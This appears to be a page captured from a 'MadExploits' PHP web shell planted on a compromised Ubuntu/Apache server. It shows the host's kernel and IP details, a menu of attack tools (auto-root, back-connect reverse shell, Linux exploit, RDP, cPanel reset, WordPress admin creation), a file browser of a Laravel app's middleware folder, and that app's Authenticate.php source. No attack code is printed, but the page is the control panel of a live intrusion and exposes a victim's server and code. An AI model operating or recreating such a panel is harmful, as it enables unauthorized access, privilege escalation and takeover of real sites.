Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.121
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticate.php
904
B
-rw-rw-r--
CORSResponse.php
643
B
-rw-rw-r--
CheckForAdmin.php
306
B
-rw-rw-r--
CheckForMaintenanceMode.php
335
B
-rw-rw-r--
CheckSuperAdmin.php
298
B
-rw-rw-r--
EncryptCookies.php
294
B
-rw-rw-r--
OnlyAjax.php
395
B
-rw-rw-r--
OnlyTesters.php
474
B
-rw-rw-r--
RedirectIfAuthenticated.php
519
B
-rw-rw-r--
TrimStrings.php
340
B
-rw-rw-r--
TrustProxies.php
429
B
-rw-rw-r--
VerifyCsrfToken.php
852
B
-rw-rw-r--
googleda794cd9937527d01.html
39
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Authenticate.php
<?php namespace App\Http\Middleware; use Illuminate\Auth\Middleware\Authenticate as Middleware; class Authenticate extends Middleware { /** * Get the path the user should be redirected to when they are not authenticated. * * @param \Illuminate\Http\Request $request * @return string */ protected function redirectTo($request) { // if(strpos($request->url(), '/test/start') !== false){ // return route('test_register'); // } if ($request->header('Accept') == 'application/json') { return route('auth_error'); } if(!$request->isXmlHttpRequest()){ return route('register'); }else { $data = $request->getContent(); if ($data) { $request->session()->put('save', $data); } return route('app_login'); } } }
Close